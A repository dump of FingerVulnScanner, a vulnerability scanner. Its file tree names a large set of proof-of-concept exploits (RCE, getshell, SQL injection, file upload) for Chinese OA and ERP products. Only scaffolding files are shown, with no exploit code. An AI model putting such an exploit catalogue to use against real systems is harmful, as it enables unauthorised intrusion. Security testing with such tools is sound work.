├── .gitattributes
├── .idea
├── .gitignore
├── FingerVulnScanner.iml
├── inspectionProfiles
│ ├── Project_Default.xml
│ └── profiles_settings.xml
├── misc.xml
├── modules.xml
└── vcs.xml
├── FingerVulnScanner.py
├── README.md
├── inc
├── __pycache__
│ ├── agent.cpython-311.pyc
│ ├── cms_detected.cpython-311.pyc
│ ├── cms_replace.cpython-311.pyc
│ ├── common.cpython-311.pyc
│ ├── config.cpython-311.pyc
│ ├── console.cpython-311.pyc
│ ├── generate_random.cpython-311.pyc
│ ├── icon.cpython-311.pyc
│ ├── init.cpython-311.pyc
│ ├── output.cpython-311.pyc
│ ├── run.cpython-311.pyc
│ └── thread.cpython-311.pyc
├── agent.py
├── cms_detected.py
├── cms_replace.py
├── common.py
├── config.py
├── console.py
├── finger.json
├── generate_random.py
├── icon.py
├── import_plugin.py
├── init.py
├── output.py
├── run.py
└── thread.py
├── poc_model.txt
├── pocs
└── web
│ ├── OA
│ ├── fanwei
│ │ ├── TestFile_weaver_common_ctrl_upload.zip
│ │ ├── __pycache__
│ │ │ ├── fanwei_Bsh_rce.cpython-311.pyc
│ │ │ ├── fanwei_WorkflowCenterTreeData_sqli.cpython-311.pyc
│ │ │ └── fanwei_common_ctrl_upload.cpython-311.pyc
│ │ ├── ebridge
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_ebridge_addResume_fileupload.cpython-311.pyc
│ │ │ │ └── fanwei_ebridge_addTaste_sqli.cpython-311.pyc
│ │ │ ├── fanwei_ebridge_addResume_fileupload.py
│ │ │ └── fanwei_ebridge_addTaste_sqli.py
│ │ ├── ecology
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_cology_FileDownload_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_CptDwrUtil_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_Getdata_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_HrmCareerApplyPerView_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_HrmService_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_KtreeUploadAction_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_LoginSSO_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_ProcessOverRequestByXml_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_ResourceServlet_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_SignatureDownLoad_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_SptmForPortalThumbnail_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_WorkPlanService_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_WorkflowServiceXml_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_XmlRpcServlet_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_browser_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_getE9DevelopAllNameValue2_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_getLabelByModule_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_getsqldata_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_jqueryFileTree_direct.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_setup_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_uploadOperation_fileupload_2022.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_v8_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_verifyquicklogin_loginbypass_2022.cpython-311.pyc
│ │ │ │ └── fanwei_ecology_workflowservicexml_rce.cpython-311.pyc
│ │ │ ├── fanwei_cology_FileDownload_lfi.py
│ │ │ ├── fanwei_ecology_CptDwrUtil_sqli.py
│ │ │ ├── fanwei_ecology_Getdata_sqli.py
│ │ │ ├── fanwei_ecology_HrmCareerApplyPerView_sqli.py
│ │ │ ├── fanwei_ecology_HrmService_sqli.py
│ │ │ ├── fanwei_ecology_KtreeUploadAction_fileupload.py
│ │ │ ├── fanwei_ecology_LoginSSO_sqli.py
│ │ │ ├── fanwei_ecology_ProcessOverRequestByXml_lfi.py
│ │ │ ├── fanwei_ecology_ResourceServlet_lfi.py
│ │ │ ├── fanwei_ecology_SignatureDownLoad_sqli.py
│ │ │ ├── fanwei_ecology_SptmForPortalThumbnail_lfi.py
│ │ │ ├── fanwei_ecology_WorkPlanService_sqli.py
│ │ │ ├── fanwei_ecology_WorkflowServiceXml_sqli.py
│ │ │ ├── fanwei_ecology_XmlRpcServlet_lfi.py
│ │ │ ├── fanwei_ecology_browser_sqli.py
│ │ │ ├── fanwei_ecology_getE9DevelopAllNameValue2_lfi.py
│ │ │ ├── fanwei_ecology_getLabelByModule_sqli.py
│ │ │ ├── fanwei_ecology_getsqldata_sqli.py
│ │ │ ├── fanwei_ecology_jqueryFileTree_direct.py
│ │ │ ├── fanwei_ecology_setup_unauth.py
│ │ │ ├── fanwei_ecology_uploadOperation_fileupload_2022.py
│ │ │ ├── fanwei_ecology_v8_sqli.py
│ │ │ ├── fanwei_ecology_verifyquicklogin_loginbypass_2022.py
│ │ │ └── fanwei_ecology_workflowservicexml_rce.py
│ │ ├── emobile
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_emobile_client_rce.cpython-311.pyc
│ │ │ │ ├── fanwei_emobile_lang2sql_fileupload.cpython-311.pyc
│ │ │ │ └── fanwei_emobile_messageType_rce.cpython-311.pyc
│ │ │ ├── fanwei_emobile_client_rce.py
│ │ │ ├── fanwei_emobile_lang2sql_fileupload.py
│ │ │ └── fanwei_emobile_messageType_rce.py
│ │ ├── eoffice
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_eoffice_OfficeServer_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_UploadFile_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_UserSelect_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_atuh-file_rce.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_config_2_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_json_common_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_jx2_config_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_leave_record_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_login_other_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_mobile_upload_save_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_schema_mysql_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_uploadify_fileupload.cpython-311.pyc
│ │ │ │ └── fanwei_eoffice_webservice_file_upload.cpython-311.pyc
│ │ │ ├── fanwei_eoffice_OfficeServer_fileupload.py
│ │ │ ├── fanwei_eoffice_UploadFile_fileupload.py
│ │ │ ├── fanwei_eoffice_UserSelect_unauth.py
│ │ │ ├── fanwei_eoffice_atuh-file_rce.py
│ │ │ ├── fanwei_eoffice_config_2_unauth.py
│ │ │ ├── fanwei_eoffice_json_common_sqli.py
│ │ │ ├── fanwei_eoffice_jx2_config_unauth.py
│ │ │ ├── fanwei_eoffice_leave_record_sqli.py
│ │ │ ├── fanwei_eoffice_login_other_sqli.py
│ │ │ ├── fanwei_eoffice_mobile_upload_save_fileupload.py
│ │ │ ├── fanwei_eoffice_schema_mysql_unauth.py
│ │ │ ├── fanwei_eoffice_uploadify_fileupload.py
│ │ │ └── fanwei_eoffice_webservice_file_upload.py
│ │ ├── fanwei_Bsh_rce.py
│ │ ├── fanwei_WorkflowCenterTreeData_sqli.py
│ │ └── fanwei_common_ctrl_upload.py
│ ├── landray
│ │ ├── __pycache__
│ │ │ ├── landray-eis-doc_fileedit_word-sqli.cpython-311.pyc
│ │ │ ├── landray-eis-frm_button_func-sqli.cpython-311.pyc
│ │ │ ├── landray-eis-rpt_listreport_definefield-sqli.cpython-311.pyc
│ │ │ ├── landray_oa-dataxml_rce.cpython-311.pyc
│ │ │ ├── landray_oa_WechatLoginHelper_sqli.cpython-311.pyc
│ │ │ ├── landray_oa_admindo_jndiinject_2021.cpython-311.pyc
│ │ │ ├── landray_oa_custom_jsp_fileread.cpython-311.pyc
│ │ │ ├── landray_oa_treexml_rce_2022.cpython-311.pyc
│ │ │ ├── landray_sysUiComponent_fileupload.cpython-311.pyc
│ │ │ ├── landray_treexml_rce.cpython-311.pyc
│ │ │ ├── landry-eis-ShowUserInfo-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-UniformEntry-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-fl_define_flow_chart_show-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-frm_form_list_main-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-saveImg-fileupload.cpython-311.pyc
│ │ │ └── landry_oa_sysUiExtend_fileupload.cpython-311.pyc
│ │ ├── landray-eis-doc_fileedit_word-sqli.py
│ │ ├── landray-eis-frm_button_func-sqli.py
│ │ ├── landray-eis-rpt_listreport_definefield-sqli.py
│ │ ├── landray_oa-dataxml_rce.py
│ │ ├── landray_oa_WechatLoginHelper_sqli.py
│ │ ├── landray_oa_admindo_jndiinject_2021.py
│ │ ├── landray_oa_custom_jsp_fileread.py
│ │ ├── landray_oa_treexml_rce_2022.py
│ │ ├── landray_sysUiComponent_fileupload.py
│ │ ├── landray_treexml_rce.py
│ │ ├── landry-eis-ShowUserInfo-sqli.py
│ │ ├── landry-eis-UniformEntry-sqli.py
│ │ ├── landry-eis-fl_define_flow_chart_show-sqli.py
│ │ ├── landry-eis-frm_form_list_main-sqli.py
│ │ ├── landry-eis-saveImg-fileupload.py
│ │ └── landry_oa_sysUiExtend_fileupload.py
│ ├── seeyon
│ │ ├── __pycache__
│ │ │ ├── seeyon_a6_sqli.cpython-311.pyc
│ │ │ ├── seeyon_get_sessionslist.cpython-311.pyc
│ │ │ ├── seeyon_oa_a8_htmlofficeservlet_getshell.cpython-311.pyc
│ │ │ ├── seeyon_oa_ajaxdo_fileupload_2022.cpython-311.pyc
│ │ │ ├── seeyon_oa_wpsassistservlet_fileupload_2022.cpython-311.pyc
│ │ │ └── seeyon_thirdpartycontroller_getshell.cpython-311.pyc
│ │ ├── seeyon_a6_sqli.py
│ │ ├── seeyon_get_sessionslist.py
│ │ ├── seeyon_oa_a8_htmlofficeservlet_getshell.py
│ │ ├── seeyon_oa_ajaxdo_fileupload_2022.py
│ │ ├── seeyon_oa_wpsassistservlet_fileupload_2022.py
│ │ └── seeyon_thirdpartycontroller_getshell.py
│ ├── tongda
│ │ ├── __pycache__
│ │ │ ├── tongda_down_lfi.cpython-311.pyc
│ │ │ ├── tongda_getdata_rce.cpython-311.pyc
│ │ │ ├── tongda_oa_2016_fileupload.cpython-311.pyc
│ │ │ ├── tongda_oa_fake_user.cpython-311.pyc
│ │ │ ├── tongda_oa_fileinclude_2020.cpython-311.pyc
│ │ │ ├── tongda_oa_qyapp-vote-submit_sqli.cpython-311.pyc
│ │ │ ├── tongda_oa_v11-8_apialiphp_fileupload.cpython-311.pyc
│ │ │ ├── tongda_sqli_getdata_php.cpython-311.pyc
│ │ │ └── tongda_videofile_fileread.cpython-311.pyc
│ │ ├── tongda_down_lfi.py
│ │ ├── tongda_getdata_rce.py
│ │ ├── tongda_oa_2016_fileupload.py
│ │ ├── tongda_oa_fake_user.py
│ │ ├── tongda_oa_fileinclude_2020.py
│ │ ├── tongda_oa_qyapp-vote-submit_sqli.py
│ │ ├── tongda_oa_v11-8_apialiphp_fileupload.py
│ │ ├── tongda_sqli_getdata_php.py
│ │ └── tongda_videofile_fileread.py
│ └── yongyou
│ │ ├── CRM
│ │ ├── __pycache__
│ │ │ ├── yongyou_crm_downloadfile_lfi.cpython-311.pyc
│ │ │ ├── yongyou_crm_getemaildata_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_crm_help2_lfi.cpython-311.pyc
│ │ │ ├── yongyou_crm_reservationcomplete.cpython-311.pyc
│ │ │ ├── yongyou_crm_swfupload__fileupload.cpython-311.pyc
│ │ │ └── yongyou_crm_uploadfile_fileupload.cpython-311.pyc
│ │ ├── yongyou_crm_downloadfile_lfi.py
│ │ ├── yongyou_crm_getemaildata_fileupload.py
│ │ ├── yongyou_crm_help2_lfi.py
│ │ ├── yongyou_crm_reservationcomplete.py
│ │ ├── yongyou_crm_reservationcomplete_rce.py
│ │ ├── yongyou_crm_swfupload__fileupload.py
│ │ └── yongyou_crm_uploadfile_fileupload.py
│ │ ├── KSOA
│ │ ├── __pycache__
│ │ │ ├── yongyou_ksoa_PreviewKPQT_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_PrintZPFB_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_PrintZPYG_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_PrintZPZP_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_QueryService_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_linkadd_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_magefield_sqli.cpython-311.pyc
│ │ │ └── yongyou_ufida_ksoa_fileupload_2022.cpython-311.pyc
│ │ ├── yongyou_ksoa_PreviewKPQT_sqli.py
│ │ ├── yongyou_ksoa_PrintZPFB_sqli.py
│ │ ├── yongyou_ksoa_PrintZPYG_sqli.py
│ │ ├── yongyou_ksoa_PrintZPZP_sqli.py
│ │ ├── yongyou_ksoa_QueryService_sqli.py
│ │ ├── yongyou_ksoa_linkadd_sqli.py
│ │ ├── yongyou_ksoa_magefield_sqli.py
│ │ └── yongyou_ufida_ksoa_fileupload_2022.py
│ │ ├── __pycache__
│ │ ├── yongyou_government_affairs_FileDownload_lfi.cpython-311.pyc
│ │ └── yongyou_u9_PatchFile_fileupload.cpython-311.pyc
│ │ ├── changjietong
│ │ ├── __pycache__
│ │ │ ├── yongyou_changjietong_CheckMutex_sqli.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_DownloadProxy_lfi.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_Edit_sqli.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_InitServerInfo_sqli.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_RRATableController_rce.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_create_site_sqli.cpython-311.pyc
│ │ │ └── yongyou_changjietong_login_sqli.cpython-311.pyc
│ │ ├── yongyou_changjietong_CheckMutex_sqli.py
│ │ ├── yongyou_changjietong_DownloadProxy_lfi.py
│ │ ├── yongyou_changjietong_Edit_sqli.py
│ │ ├── yongyou_changjietong_InitServerInfo_sqli.py
│ │ ├── yongyou_changjietong_RRATableController_rce.py
│ │ ├── yongyou_changjietong_create_site_sqli.py
│ │ └── yongyou_changjietong_login_sqli.py
│ │ ├── grp-u8
│ │ ├── __pycache__
│ │ │ ├── yongyou_grp-u8_FileUpload_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_grp-u8_UploadFileData_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_grp-u8_operOriztion_sqli.cpython-311.pyc
│ │ │ └── yongyou_grp-u8_proxy_xxe-sqli_2022.cpython-311.pyc
│ │ ├── yongyou_grp-u8_FileUpload_fileupload.py
│ │ ├── yongyou_grp-u8_UploadFileData_fileupload.py
│ │ ├── yongyou_grp-u8_operOriztion_sqli.py
│ │ └── yongyou_grp-u8_proxy_xxe-sqli_2022.py
│ │ ├── nc
│ │ ├── __pycache__
│ │ │ ├── yongyou_nc-find-web_fileread.cpython-311.pyc
│ │ │ ├── yongyou_nc_FileManager_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_avatar_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_aveXmlToFIleServlet_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_bill_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_blobRefClassSea_rce.cpython-311.pyc
│ │ │ ├── yongyou_nc_downCourseWare_lfi.cpython-311.pyc
│ │ │ ├── yongyou_nc_download_lfi.cpython-311.pyc
│ │ │ ├── yongyou_nc_download_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_file-receive-servlet_fileupload_2021.cpython-311.pyc
│ │ │ ├── yongyou_nc_fileserver_loginbypass.cpython-311.pyc
│ │ │ ├── yongyou_nc_fileupload_2022.cpython-311.pyc
│ │ │ ├── yongyou_nc_grouptemplet_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_importhttpscer_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_jsinvoke_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_queryPsnInfo_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_queryStaffByName_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_querygoodsgridbycode_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_rce_2022.cpython-311.pyc
│ │ │ ├── yongyou_nc_runStateServlet_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_saveImageServlet_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_showcontent_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_soapFormat_xxe.cpython-311.pyc
│ │ │ ├── yongyou_nc_uploadChunk _fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_uploadControl_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_warningDetailInfo_sqli.cpython-311.pyc
│ │ │ └── yongyou_nc_workflowImageServlet_sqli.cpython-311.pyc
│ │ ├── yongyou_nc-find-web_fileread.py
│ │ ├── yongyou_nc_FileManager_fileupload.py
│ │ ├── yongyou_nc_avatar_fileupload.py
│ │ ├── yongyou_nc_aveXmlToFIleServlet_fileupload.py
│ │ ├── yongyou_nc_bill_sqli.py
│ │ ├── yongyou_nc_blobRefClassSea_rce.py
│ │ ├── yongyou_nc_downCourseWare_lfi.py
│ │ ├── yongyou_nc_download_lfi.py
│ │ ├── yongyou_nc_download_sqli.py
│ │ ├── yongyou_nc_file-receive-servlet_fileupload_2021.py
│ │ ├── yongyou_nc_fileserver_loginbypass.py
│ │ ├── yongyou_nc_fileupload_2022.py
│ │ ├── yongyou_nc_grouptemplet_fileupload.py
│ │ ├── yongyou_nc_importhttpscer_fileupload.py
│ │ ├── yongyou_nc_jsinvoke_fileupload.py
│ │ ├── yongyou_nc_queryPsnInfo_sqli.py
│ │ ├── yongyou_nc_queryStaffByName_sqli.py
│ │ ├── yongyou_nc_querygoodsgridbycode_sqli.py
│ │ ├── yongyou_nc_rce_2022.py
│ │ ├── yongyou_nc_runStateServlet_sqli.py
│ │ ├── yongyou_nc_saveImageServlet_fileupload.py
│ │ ├── yongyou_nc_showcontent_sqli.py
│ │ ├── yongyou_nc_smartweb2.RPC.d_xml.py
│ │ ├── yongyou_nc_soapFormat_xxe.py
│ │ ├── yongyou_nc_uploadChunk _fileupload.py
│ │ ├── yongyou_nc_uploadControl_fileupload.py
│ │ ├── yongyou_nc_warningDetailInfo_sqli.py
│ │ ├── yongyou_nc_word.docx_lfi.py
│ │ ├── yongyou_nc_workflowImageServlet_sqli.py
│ │ └── yongyou_ncsaveDoc.ajax_fileupload.py
│ │ ├── u8
│ │ ├── __pycache__
│ │ │ ├── yongyou_u8_FileServlet_lfi.cpython-311.pyc
│ │ │ ├── yongyou_u8_KeyWordDetailReportQuery_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_KeyWordReportQuery_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_MeasQueryConditionFrameAction_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_RegisterServlet_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_ServiceDispatcherServlet_deserialization.cpython-311.pyc
│ │ │ ├── yongyou_u8_base64_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_doUpload_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_u8_linkntb_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_runScript_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_showRPCLoadingTip_xxe.cpython-311.pyc
│ │ │ └── yongyou_u8_upload_fileupload.cpython-311.pyc
│ │ ├── yongyou_u8_FileServlet_lfi.py
│ │ ├── yongyou_u8_KeyWordDetailReportQuery_sqli.py
│ │ ├── yongyou_u8_KeyWordReportQuery_sqli.py
│ │ ├── yongyou_u8_MeasQueryConditionFrameAction_sqli.py
│ │ ├── yongyou_u8_RegisterServlet_sqli.py
│ │ ├── yongyou_u8_ServiceDispatcherServlet_deserialization.py
│ │ ├── yongyou_u8_base64_sqli.py
│ │ ├── yongyou_u8_doUpload_fileupload.py
│ │ ├── yongyou_u8_linkntb_sqli.py
│ │ ├── yongyou_u8_login2.RegisterServlet_sqli.py
│ │ ├── yongyou_u8_runScript_sqli.py
│ │ ├── yongyou_u8_showRPCLoadingTip_xxe.py
│ │ └── yongyou_u8_upload_fileupload.py
│ │ ├── u9
│ │ ├── __pycache__
│ │ │ ├── yongyou_u9_DoQuery_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u9_GetConnectionString_infoleak.cpython-311.pyc
│ │ │ ├── yongyou_u9_PatchFile_fileupload.cpython-311.pyc
│ │ │ └── yongyou_u9_UMWebService_lfi.cpython-311.pyc
│ │ ├── yongyou_u9_DoQuery_sqli.py
│ │ ├── yongyou_u9_GetConnectionString_infoleak.py
│ │ ├── yongyou_u9_PatchFile_fileupload.py
│ │ └── yongyou_u9_UMWebService_lfi.py
│ │ ├── ufida
│ │ ├── __pycache__
│ │ │ ├── yongyou_ufida_ELTextFile_lfi.cpython-311.pyc
│ │ │ ├── yongyou_ufida_getFileLocal_lfi.cpython-311.pyc
│ │ │ ├── yongyou_ufida_uploadApk_fileupload.cpython-311.pyc
│ │ │ └── yongyou_ufida_uploadIcon_fileupload.cpython-311.pyc
│ │ ├── yongyou_ufida_ELTextFile_lfi.py
│ │ ├── yongyou_ufida_getFileLocal_lfi.py
│ │ ├── yongyou_ufida_uploadApk_fileupload.py
│ │ └── yongyou_ufida_uploadIcon_fileupload.py
│ │ ├── yongyou_government_affairs_FileDownload_lfi.py
│ │ └── yongyou_u9_PatchFile_fileupload.py
│ └── esafenet
│ ├── __pycache__
│ ├── esafenet_CDGAuthoriseTempletService1_sqli.cpython-311.pyc
│ ├── esafenet_DecryptApplication_lfi.cpython-311.pyc
│ ├── esafenet_DecryptionApp_rce.cpython-311.pyc
│ ├── esafenet_UploadFileManagerService_lfi.cpython-311.pyc
│ └── esafenet_dataimport_rce.cpython-311.pyc
│ ├── esafenet_CDGAuthoriseTempletService1_sqli.py
│ ├── esafenet_DecryptApplication_lfi.py
│ ├── esafenet_DecryptionApp_rce.py
│ ├── esafenet_UploadFileManagerService_lfi.py
│ └── esafenet_dataimport_rce.py
└── requirements.txt
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 |
--------------------------------------------------------------------------------
/.idea/FingerVulnScanner.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
17 |
18 |
19 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/FingerVulnScanner.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding=utf-8
3 |
4 |
5 | from inc import console
6 |
def main():
    """Entry point: hand control to the interactive console in inc/console.py."""
    console.console()
10 |
# Only start the console when run as a script, never on import.
if __name__ == '__main__':
    main()
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/inc/__pycache__/agent.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/agent.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/cms_detected.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/cms_detected.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/cms_replace.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/cms_replace.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/common.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/common.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/config.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/config.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/console.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/console.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/generate_random.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/generate_random.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/icon.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/icon.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/init.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/init.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/output.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/output.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/run.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/run.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/thread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/thread.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/config.py:
--------------------------------------------------------------------------------
# FingerVulnScanner config

# Progress display (enabled by default)
show_progress = True
# Output file path (empty by default, i.e. no output file is written)
output_path = r''

# Maximum number of worker threads in the pool
max_threads = 30
# Maximum timeout for a single poc (presumably seconds, as passed to requests — confirm in the runner).
# NOTE(review): the poc files in this dump call requests.get() without a timeout= argument,
# so this value only takes effect where inc/thread.py or inc/run.py enforce it — verify.
timeout = 13
# Sleep interval between requests (default: none; the original note says 1 is the default when threading is enabled)
delay = 0
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/inc/generate_random.py:
--------------------------------------------------------------------------------
import random
import string
2 |
3 |
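def generate_random_str(randomlength=16):
    """Return a random alphanumeric string of ``randomlength`` characters.

    Characters are drawn uniformly from ASCII letters and digits; a
    non-positive length yields the empty string.

    The generator is ``random``, which is not cryptographically secure:
    fine for non-secret values such as probe markers, never for secrets,
    tokens or anything an attacker must not be able to predict.
    """
    # The original hand-written alphabet contained 'IGK'/'igk' instead of
    # 'IJK'/'ijk', so 'J' and 'j' were never produced and 'G'/'g' were
    # over-represented; the stdlib constants give the intended set.
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choice(alphabet) for _ in range(randomlength))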
14 |
15 |
def generate_random_number(num_digits=5):
    """Return a random integer with exactly ``num_digits`` digits, as a string.

    The first digit is never zero. Raises ValueError when ``num_digits``
    is not a positive integer.
    """
    if num_digits <= 0:
        raise ValueError("Number of digits must be a positive integer.")
    # Smallest and largest num_digits-digit values, both inclusive.
    low, high = 10 ** (num_digits - 1), 10 ** num_digits - 1
    return str(random.randint(low, high))
31 |
--------------------------------------------------------------------------------
/inc/import_plugin.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/import_plugin.py
--------------------------------------------------------------------------------
/inc/run.py:
--------------------------------------------------------------------------------
